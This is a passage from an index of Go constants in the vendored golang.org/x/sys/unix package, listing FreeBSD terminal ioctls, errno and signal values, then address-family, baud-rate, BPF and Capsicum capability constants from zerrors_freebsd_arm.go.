TIOCPKT_START (line 1699) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1700) | TIOCPKT_STOP = 0x4 constant TIOCPTMASTER (line 1701) | TIOCPTMASTER = 0x2000741c constant TIOCSBRK (line 1702) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1703) | TIOCSCTTY = 0x20007461 constant TIOCSDRAINWAIT (line 1704) | TIOCSDRAINWAIT = 0x80047457 constant TIOCSDTR (line 1705) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1706) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1707) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1708) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1709) | TIOCSETD = 0x8004741b constant TIOCSIG (line 1710) | TIOCSIG = 0x2004745f constant TIOCSPGRP (line 1711) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1712) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1713) | TIOCSTAT = 0x20007465 constant TIOCSTI (line 1714) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1715) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1716) | TIOCSWINSZ = 0x80087467 constant TIOCTIMESTAMP (line 1717) | TIOCTIMESTAMP = 0x40107459 constant TIOCUCNTL (line 1718) | TIOCUCNTL = 0x80047466 constant TOSTOP (line 1719) | TOSTOP = 0x400000 constant UTIME_NOW (line 1720) | UTIME_NOW = -0x1 constant UTIME_OMIT (line 1721) | UTIME_OMIT = -0x2 constant VDISCARD (line 1722) | VDISCARD = 0xf constant VDSUSP (line 1723) | VDSUSP = 0xb constant VEOF (line 1724) | VEOF = 0x0 constant VEOL (line 1725) | VEOL = 0x1 constant VEOL2 (line 1726) | VEOL2 = 0x2 constant VERASE (line 1727) | VERASE = 0x3 constant VERASE2 (line 1728) | VERASE2 = 0x7 constant VINTR (line 1729) | VINTR = 0x8 constant VKILL (line 1730) | VKILL = 0x5 constant VLNEXT (line 1731) | VLNEXT = 0xe constant VMIN (line 1732) | VMIN = 0x10 constant VQUIT (line 1733) | VQUIT = 0x9 constant VREPRINT (line 1734) | VREPRINT = 0x6 constant VSTART (line 1735) | VSTART = 0xc constant VSTATUS (line 1736) | VSTATUS = 0x12 constant VSTOP (line 1737) | VSTOP = 0xd constant VSUSP (line 1738) | VSUSP = 0xa constant VTIME (line 1739) | VTIME = 0x11 constant VWERASE (line 1740) | VWERASE = 0x4 constant WCONTINUED (line 1741) | WCONTINUED = 0x4 constant WCOREFLAG (line 1742) | WCOREFLAG = 0x80 constant WEXITED (line 1743) | WEXITED = 0x10 constant WLINUXCLONE (line 1744) | WLINUXCLONE = 0x80000000 constant WNOHANG (line 1745) | WNOHANG = 0x1 constant WNOWAIT (line 1746) | WNOWAIT = 0x8 constant WSTOPPED (line 1747) | WSTOPPED = 0x2 constant WTRAPPED (line 1748) | WTRAPPED = 0x20 constant WUNTRACED (line 1749) | WUNTRACED = 0x2 constant E2BIG (line 1754) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1755) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1756) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1757) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1758) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1759) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1760) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1761) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1762) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1763) | EBADMSG = syscall.Errno(0x59) constant EBADRPC (line 1764) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1765) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1766) | ECANCELED = syscall.Errno(0x55) constant ECAPMODE (line 1767) | ECAPMODE = syscall.Errno(0x5e) constant ECHILD (line 1768) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1769) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1770) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1771) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1772) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1773) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1774) | EDOM = syscall.Errno(0x21) constant EDOOFUS (line 1775) | EDOOFUS = syscall.Errno(0x58) constant EDQUOT (line 1776) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1777) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1778) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1779) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1780) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1781) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1782) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1783) | EIDRM = syscall.Errno(0x52) constant EILSEQ (line 1784) | EILSEQ = syscall.Errno(0x56) constant EINPROGRESS (line 1785) | EINPROGRESS = syscall.Errno(0x24) constant EINTEGRITY (line 1786) | EINTEGRITY = syscall.Errno(0x61) constant EINTR (line 1787) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1788) | EINVAL = syscall.Errno(0x16) constant EIO (line 1789) | EIO = syscall.Errno(0x5) constant EISCONN (line 1790) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1791) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1792) | ELAST = syscall.Errno(0x61) constant ELOOP (line 1793) | ELOOP = syscall.Errno(0x3e) constant EMFILE (line 1794) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1795) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1796) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 1797) | EMULTIHOP = syscall.Errno(0x5a) constant ENAMETOOLONG (line 1798) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1799) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1800) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1801) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1802) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1803) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1804) | ENOATTR = syscall.Errno(0x57) constant ENOBUFS (line 1805) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1806) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1807) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1808) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1809) | ENOLCK = syscall.Errno(0x4d) constant ENOLINK (line 1810) | ENOLINK = syscall.Errno(0x5b) constant ENOMEM (line 1811) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1812) | ENOMSG = syscall.Errno(0x53) constant ENOPROTOOPT (line 1813) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1814) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1815) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1816) | ENOTBLK = syscall.Errno(0xf) constant ENOTCAPABLE (line 1817) | ENOTCAPABLE = syscall.Errno(0x5d) constant ENOTCONN (line 1818) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1819) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1820) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1821) | ENOTRECOVERABLE = syscall.Errno(0x5f) constant ENOTSOCK (line 1822) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1823) | ENOTSUP = syscall.Errno(0x2d) constant ENOTTY (line 1824) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1825) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1826) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1827) | EOVERFLOW = syscall.Errno(0x54) constant EOWNERDEAD (line 1828) | EOWNERDEAD = syscall.Errno(0x60) constant EPERM (line 1829) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1830) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1831) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1832) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1833) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1834) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1835) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1836) | EPROTO = syscall.Errno(0x5c) constant EPROTONOSUPPORT (line 1837) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1838) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1839) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1840) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1841) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1842) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1843) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1844) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1845) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1846) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1847) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1848) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1849) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1850) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1851) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1852) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1853) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1858) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1859) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1860) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1861) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1862) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1863) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1864) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1865) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1866) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1867) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1868) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1869) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1870) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1871) | SIGKILL = syscall.Signal(0x9) constant SIGLIBRT (line 1872) | SIGLIBRT = syscall.Signal(0x21) constant SIGLWP (line 1873) | SIGLWP = syscall.Signal(0x20) constant SIGPIPE (line 1874) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1875) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1876) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1877) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1878) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1879) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1880) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1881) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1882) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1883) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1884) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1885) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1886) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1887) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1888) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1889) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1890) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1891) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1892) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_freebsd_arm.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_ARP (line 15) | AF_ARP = 0x23 constant AF_ATM (line 16) | AF_ATM = 0x1e constant AF_BLUETOOTH (line 17) | AF_BLUETOOTH = 0x24 constant AF_CCITT (line 18) | AF_CCITT = 0xa constant AF_CHAOS (line 19) | AF_CHAOS = 0x5 constant AF_CNT (line 20) | AF_CNT = 0x15 constant AF_COIP (line 21) | AF_COIP = 0x14 constant AF_DATAKIT (line 22) | AF_DATAKIT = 0x9 constant AF_DECnet (line 23) | AF_DECnet = 0xc constant AF_DLI (line 24) | AF_DLI = 0xd constant AF_E164 (line 25) | AF_E164 = 0x1a constant AF_ECMA (line 26) | AF_ECMA = 0x8 constant AF_HYLINK (line 27) | AF_HYLINK = 0xf constant AF_IEEE80211 (line 28) | AF_IEEE80211 = 0x25 constant AF_IMPLINK (line 29) | AF_IMPLINK = 0x3 constant AF_INET (line 30) | AF_INET = 0x2 constant AF_INET6 (line 31) | AF_INET6 = 0x1c constant AF_INET6_SDP (line 32) | AF_INET6_SDP = 0x2a constant AF_INET_SDP (line 33) | AF_INET_SDP = 0x28 constant AF_IPX (line 34) | AF_IPX = 0x17 constant AF_ISDN (line 35) | AF_ISDN = 0x1a constant AF_ISO (line 36) | AF_ISO = 0x7 constant AF_LAT (line 37) | AF_LAT = 0xe constant AF_LINK (line 38) | AF_LINK = 0x12 constant AF_LOCAL (line 39) | AF_LOCAL = 0x1 constant AF_MAX (line 40) | AF_MAX = 0x2a constant AF_NATM (line 41) | AF_NATM = 0x1d constant AF_NETBIOS (line 42) | AF_NETBIOS = 0x6 constant AF_NETGRAPH (line 43) | AF_NETGRAPH = 0x20 constant AF_OSI (line 44) | AF_OSI = 0x7 constant AF_PUP (line 45) | AF_PUP = 0x4 constant AF_ROUTE (line 46) | AF_ROUTE = 0x11 constant AF_SCLUSTER (line 47) | AF_SCLUSTER = 0x22 constant AF_SIP (line 48) | AF_SIP = 0x18 constant AF_SLOW (line 49) | AF_SLOW = 0x21 constant AF_SNA (line 50) | AF_SNA = 0xb constant AF_UNIX (line 51) | AF_UNIX = 0x1 constant AF_UNSPEC (line 52) | AF_UNSPEC = 0x0 constant AF_VENDOR00 (line 53) | AF_VENDOR00 = 0x27 constant AF_VENDOR01 (line 54) | AF_VENDOR01 = 0x29 constant AF_VENDOR02 (line 55) | AF_VENDOR02 = 0x2b constant AF_VENDOR03 (line 56) | AF_VENDOR03 = 0x2d constant AF_VENDOR04 (line 57) | AF_VENDOR04 = 0x2f constant AF_VENDOR05 (line 58) | AF_VENDOR05 = 0x31 constant AF_VENDOR06 (line 59) | AF_VENDOR06 = 0x33 constant AF_VENDOR07 (line 60) | AF_VENDOR07 = 0x35 constant AF_VENDOR08 (line 61) | AF_VENDOR08 = 0x37 constant AF_VENDOR09 (line 62) | AF_VENDOR09 = 0x39 constant AF_VENDOR10 (line 63) | AF_VENDOR10 = 0x3b constant AF_VENDOR11 (line 64) | AF_VENDOR11 = 0x3d constant AF_VENDOR12 (line 65) | AF_VENDOR12 = 0x3f constant AF_VENDOR13 (line 66) | AF_VENDOR13 = 0x41 constant AF_VENDOR14 (line 67) | AF_VENDOR14 = 0x43 constant AF_VENDOR15 (line 68) | AF_VENDOR15 = 0x45 constant AF_VENDOR16 (line 69) | AF_VENDOR16 = 0x47 constant AF_VENDOR17 (line 70) | AF_VENDOR17 = 0x49 constant AF_VENDOR18 (line 71) | AF_VENDOR18 = 0x4b constant AF_VENDOR19 (line 72) | AF_VENDOR19 = 0x4d constant AF_VENDOR20 (line 73) | AF_VENDOR20 = 0x4f constant AF_VENDOR21 (line 74) | AF_VENDOR21 = 0x51 constant AF_VENDOR22 (line 75) | AF_VENDOR22 = 0x53 constant AF_VENDOR23 (line 76) | AF_VENDOR23 = 0x55 constant AF_VENDOR24 (line 77) | AF_VENDOR24 = 0x57 constant AF_VENDOR25 (line 78) | AF_VENDOR25 = 0x59 constant AF_VENDOR26 (line 79) | AF_VENDOR26 = 0x5b constant AF_VENDOR27 (line 80) | AF_VENDOR27 = 0x5d constant AF_VENDOR28 (line 81) | AF_VENDOR28 = 0x5f constant AF_VENDOR29 (line 82) | AF_VENDOR29 = 0x61 constant AF_VENDOR30 (line 83) | AF_VENDOR30 = 0x63 constant AF_VENDOR31 (line 84) | AF_VENDOR31 = 0x65 constant AF_VENDOR32 (line 85) | AF_VENDOR32 = 0x67 constant AF_VENDOR33 (line 86) | AF_VENDOR33 = 0x69 constant AF_VENDOR34 (line 87) | AF_VENDOR34 = 0x6b constant AF_VENDOR35 (line 88) | AF_VENDOR35 = 0x6d constant AF_VENDOR36 (line 89) | AF_VENDOR36 = 0x6f constant AF_VENDOR37 (line 90) | AF_VENDOR37 = 0x71 constant AF_VENDOR38 (line 91) | AF_VENDOR38 = 0x73 constant AF_VENDOR39 (line 92) | AF_VENDOR39 = 0x75 constant AF_VENDOR40 (line 93) | AF_VENDOR40 = 0x77 constant AF_VENDOR41 (line 94) | AF_VENDOR41 = 0x79 constant AF_VENDOR42 (line 95) | AF_VENDOR42 = 0x7b constant AF_VENDOR43 (line 96) | AF_VENDOR43 = 0x7d constant AF_VENDOR44 (line 97) | AF_VENDOR44 = 0x7f constant AF_VENDOR45 (line 98) | AF_VENDOR45 = 0x81 constant AF_VENDOR46 (line 99) | AF_VENDOR46 = 0x83 constant AF_VENDOR47 (line 100) | AF_VENDOR47 = 0x85 constant ALTWERASE (line 101) | ALTWERASE = 0x200 constant B0 (line 102) | B0 = 0x0 constant B110 (line 103) | B110 = 0x6e constant B115200 (line 104) | B115200 = 0x1c200 constant B1200 (line 105) | B1200 = 0x4b0 constant B134 (line 106) | B134 = 0x86 constant B14400 (line 107) | B14400 = 0x3840 constant B150 (line 108) | B150 = 0x96 constant B1800 (line 109) | B1800 = 0x708 constant B19200 (line 110) | B19200 = 0x4b00 constant B200 (line 111) | B200 = 0xc8 constant B230400 (line 112) | B230400 = 0x38400 constant B2400 (line 113) | B2400 = 0x960 constant B28800 (line 114) | B28800 = 0x7080 constant B300 (line 115) | B300 = 0x12c constant B38400 (line 116) | B38400 = 0x9600 constant B460800 (line 117) | B460800 = 0x70800 constant B4800 (line 118) | B4800 = 0x12c0 constant B50 (line 119) | B50 = 0x32 constant B57600 (line 120) | B57600 = 0xe100 constant B600 (line 121) | B600 = 0x258 constant B7200 (line 122) | B7200 = 0x1c20 constant B75 (line 123) | B75 = 0x4b constant B76800 (line 124) | B76800 = 0x12c00 constant B921600 (line 125) | B921600 = 0xe1000 constant B9600 (line 126) | B9600 = 0x2580 constant BIOCFEEDBACK (line 127) | BIOCFEEDBACK = 0x8004427c constant BIOCFLUSH (line 128) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 129) | BIOCGBLEN = 0x40044266 constant BIOCGDIRECTION (line 130) | BIOCGDIRECTION = 0x40044276 constant BIOCGDLT (line 131) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 132) | BIOCGDLTLIST = 0xc0084279 constant BIOCGETBUFMODE (line 133) | BIOCGETBUFMODE = 0x4004427d constant BIOCGETIF (line 134) | BIOCGETIF = 0x4020426b constant BIOCGETZMAX (line 135) | BIOCGETZMAX = 0x4004427f constant BIOCGHDRCMPLT (line 136) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRSIG (line 137) | BIOCGRSIG = 0x40044272 constant BIOCGRTIMEOUT (line 138) | BIOCGRTIMEOUT = 0x4010426e constant BIOCGSEESENT (line 139) | BIOCGSEESENT = 0x40044276 constant BIOCGSTATS (line 140) | BIOCGSTATS = 0x4008426f constant BIOCGTSTAMP (line 141) | BIOCGTSTAMP = 0x40044283 constant BIOCIMMEDIATE (line 142) | BIOCIMMEDIATE = 0x80044270 constant BIOCLOCK (line 143) | BIOCLOCK = 0x2000427a constant BIOCPROMISC (line 144) | BIOCPROMISC = 0x20004269 constant BIOCROTZBUF (line 145) | BIOCROTZBUF = 0x400c4280 constant BIOCSBLEN (line 146) | BIOCSBLEN = 0xc0044266 constant BIOCSDIRECTION (line 147) | BIOCSDIRECTION = 0x80044277 constant BIOCSDLT (line 148) | BIOCSDLT = 0x80044278 constant BIOCSETBUFMODE (line 149) | BIOCSETBUFMODE = 0x8004427e constant BIOCSETF (line 150) | BIOCSETF = 0x80084267 constant BIOCSETFNR (line 151) | BIOCSETFNR = 0x80084282 constant BIOCSETIF (line 152) | BIOCSETIF = 0x8020426c constant BIOCSETVLANPCP (line 153) | BIOCSETVLANPCP = 0x80044285 constant BIOCSETWF (line 154) | BIOCSETWF = 0x8008427b constant BIOCSETZBUF (line 155) | BIOCSETZBUF = 0x800c4281 constant BIOCSHDRCMPLT (line 156) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRSIG (line 157) | BIOCSRSIG = 0x80044273 constant BIOCSRTIMEOUT (line 158) | BIOCSRTIMEOUT = 0x8010426d constant BIOCSSEESENT (line 159) | BIOCSSEESENT = 0x80044277 constant BIOCSTSTAMP (line 160) | BIOCSTSTAMP = 0x80044284 constant BIOCVERSION (line 161) | BIOCVERSION = 0x40044271 constant BPF_A (line 162) | BPF_A = 0x10 constant BPF_ABS (line 163) | BPF_ABS = 0x20 constant BPF_ADD (line 164) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 165) | BPF_ALIGNMENT = 0x4 constant BPF_ALU (line 166) | BPF_ALU = 0x4 constant BPF_AND (line 167) | BPF_AND = 0x50 constant BPF_B (line 168) | BPF_B = 0x10 constant BPF_BUFMODE_BUFFER (line 169) | BPF_BUFMODE_BUFFER = 0x1 constant BPF_BUFMODE_ZBUF (line 170) | BPF_BUFMODE_ZBUF = 0x2 constant BPF_DIV (line 171) | BPF_DIV = 0x30 constant BPF_H (line 172) | BPF_H = 0x8 constant BPF_IMM (line 173) | BPF_IMM = 0x0 constant BPF_IND (line 174) | BPF_IND = 0x40 constant BPF_JA (line 175) | BPF_JA = 0x0 constant BPF_JEQ (line 176) | BPF_JEQ = 0x10 constant BPF_JGE (line 177) | BPF_JGE = 0x30 constant BPF_JGT (line 178) | BPF_JGT = 0x20 constant BPF_JMP (line 179) | BPF_JMP = 0x5 constant BPF_JSET (line 180) | BPF_JSET = 0x40 constant BPF_K (line 181) | BPF_K = 0x0 constant BPF_LD (line 182) | BPF_LD = 0x0 constant BPF_LDX (line 183) | BPF_LDX = 0x1 constant BPF_LEN (line 184) | BPF_LEN = 0x80 constant BPF_LSH (line 185) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 186) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 187) | BPF_MAXBUFSIZE = 0x80000 constant BPF_MAXINSNS (line 188) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 189) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 190) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 191) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 192) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 193) | BPF_MISC = 0x7 constant BPF_MOD (line 194) | BPF_MOD = 0x90 constant BPF_MSH (line 195) | BPF_MSH = 0xa0 constant BPF_MUL (line 196) | BPF_MUL = 0x20 constant BPF_NEG (line 197) | BPF_NEG = 0x80 constant BPF_OR (line 198) | BPF_OR = 0x40 constant BPF_RELEASE (line 199) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 200) | BPF_RET = 0x6 constant BPF_RSH (line 201) | BPF_RSH = 0x70 constant BPF_ST (line 202) | BPF_ST = 0x2 constant BPF_STX (line 203) | BPF_STX = 0x3 constant BPF_SUB (line 204) | BPF_SUB = 0x10 constant BPF_TAX (line 205) | BPF_TAX = 0x0 constant BPF_TXA (line 206) | BPF_TXA = 0x80 constant BPF_T_BINTIME (line 207) | BPF_T_BINTIME = 0x2 constant BPF_T_BINTIME_FAST (line 208) | BPF_T_BINTIME_FAST = 0x102 constant BPF_T_BINTIME_MONOTONIC (line 209) | BPF_T_BINTIME_MONOTONIC = 0x202 constant BPF_T_BINTIME_MONOTONIC_FAST (line 210) | BPF_T_BINTIME_MONOTONIC_FAST = 0x302 constant BPF_T_FAST (line 211) | BPF_T_FAST = 0x100 constant BPF_T_FLAG_MASK (line 212) | BPF_T_FLAG_MASK = 0x300 constant BPF_T_FORMAT_MASK (line 213) | BPF_T_FORMAT_MASK = 0x3 constant BPF_T_MICROTIME (line 214) | BPF_T_MICROTIME = 0x0 constant BPF_T_MICROTIME_FAST (line 215) | BPF_T_MICROTIME_FAST = 0x100 constant BPF_T_MICROTIME_MONOTONIC (line 216) | BPF_T_MICROTIME_MONOTONIC = 0x200 constant BPF_T_MICROTIME_MONOTONIC_FAST (line 217) | BPF_T_MICROTIME_MONOTONIC_FAST = 0x300 constant BPF_T_MONOTONIC (line 218) | BPF_T_MONOTONIC = 0x200 constant BPF_T_MONOTONIC_FAST (line 219) | BPF_T_MONOTONIC_FAST = 0x300 constant BPF_T_NANOTIME (line 220) | BPF_T_NANOTIME = 0x1 constant BPF_T_NANOTIME_FAST (line 221) | BPF_T_NANOTIME_FAST = 0x101 constant BPF_T_NANOTIME_MONOTONIC (line 222) | BPF_T_NANOTIME_MONOTONIC = 0x201 constant BPF_T_NANOTIME_MONOTONIC_FAST (line 223) | BPF_T_NANOTIME_MONOTONIC_FAST = 0x301 constant BPF_T_NONE (line 224) | BPF_T_NONE = 0x3 constant BPF_T_NORMAL (line 225) | BPF_T_NORMAL = 0x0 constant BPF_W (line 226) | BPF_W = 0x0 constant BPF_X (line 227) | BPF_X = 0x8 constant BPF_XOR (line 228) | BPF_XOR = 0xa0 constant BRKINT (line 229) | BRKINT = 0x2 constant CAP_ACCEPT (line 230) | CAP_ACCEPT = 0x200000020000000 constant CAP_ACL_CHECK (line 231) | CAP_ACL_CHECK = 0x400000000010000 constant CAP_ACL_DELETE (line 232) | CAP_ACL_DELETE = 0x400000000020000 constant CAP_ACL_GET (line 233) | CAP_ACL_GET = 0x400000000040000 constant CAP_ACL_SET (line 234) | CAP_ACL_SET = 0x400000000080000 constant CAP_ALL0 (line 235) | CAP_ALL0 = 0x20007ffffffffff constant CAP_ALL1 (line 236) | CAP_ALL1 = 0x4000000001fffff constant CAP_BIND (line 237) | CAP_BIND = 0x200000040000000 constant CAP_BINDAT (line 238) | CAP_BINDAT = 0x200008000000400 constant CAP_CHFLAGSAT (line 239) | CAP_CHFLAGSAT = 0x200000000001400 constant CAP_CONNECT (line 240) | CAP_CONNECT = 0x200000080000000 constant CAP_CONNECTAT (line 241) | CAP_CONNECTAT = 0x200010000000400 constant CAP_CREATE (line 242) | CAP_CREATE = 0x200000000000040 constant CAP_EVENT (line 243) | CAP_EVENT = 0x400000000000020 constant CAP_EXTATTR_DELETE (line 244) | CAP_EXTATTR_DELETE = 0x400000000001000 constant CAP_EXTATTR_GET (line 245) | CAP_EXTATTR_GET = 0x400000000002000 constant CAP_EXTATTR_LIST (line 246) | CAP_EXTATTR_LIST = 0x400000000004000 constant CAP_EXTATTR_SET (line 247) | CAP_EXTATTR_SET = 0x400000000008000 constant CAP_FCHDIR (line 248) | CAP_FCHDIR = 0x200000000000800 constant CAP_FCHFLAGS (line 249) | CAP_FCHFLAGS = 0x200000000001000 constant CAP_FCHMOD (line 250) | CAP_FCHMOD = 0x200000000002000 constant CAP_FCHMODAT (line 251) | CAP_FCHMODAT = 0x200000000002400 constant CAP_FCHOWN (line 252) | CAP_FCHOWN = 0x200000000004000 constant CAP_FCHOWNAT (line 253) | CAP_FCHOWNAT = 0x200000000004400 constant CAP_FCNTL (line 254) | CAP_FCNTL = 0x200000000008000 constant CAP_FCNTL_ALL (line 255) | CAP_FCNTL_ALL = 0x78 constant CAP_FCNTL_GETFL (line 256) | CAP_FCNTL_GETFL = 0x8 constant CAP_FCNTL_GETOWN (line 257) | CAP_FCNTL_GETOWN = 0x20 constant CAP_FCNTL_SETFL (line 258) | CAP_FCNTL_SETFL = 0x10 constant CAP_FCNTL_SETOWN (line 259) | CAP_FCNTL_SETOWN = 0x40 constant CAP_FEXECVE (line 260) | CAP_FEXECVE = 0x200000000000080 constant CAP_FLOCK (line 261) | CAP_FLOCK = 0x200000000010000 constant CAP_FPATHCONF (line 262) | CAP_FPATHCONF = 0x200000000020000 constant CAP_FSCK (line 263) | CAP_FSCK = 0x200000000040000 constant CAP_FSTAT (line 264) | CAP_FSTAT = 0x200000000080000 constant CAP_FSTATAT (line 265) | CAP_FSTATAT = 0x200000000080400 constant CAP_FSTATFS (line 266) | CAP_FSTATFS = 0x200000000100000 constant CAP_FSYNC (line 267) | CAP_FSYNC = 0x200000000000100 constant CAP_FTRUNCATE (line 268) | CAP_FTRUNCATE = 0x200000000000200 constant CAP_FUTIMES (line 269) | CAP_FUTIMES = 0x200000000200000 constant CAP_FUTIMESAT (line 270) | CAP_FUTIMESAT = 0x200000000200400 constant CAP_GETPEERNAME (line 271) | CAP_GETPEERNAME = 0x200000100000000 constant CAP_GETSOCKNAME (line 272) | 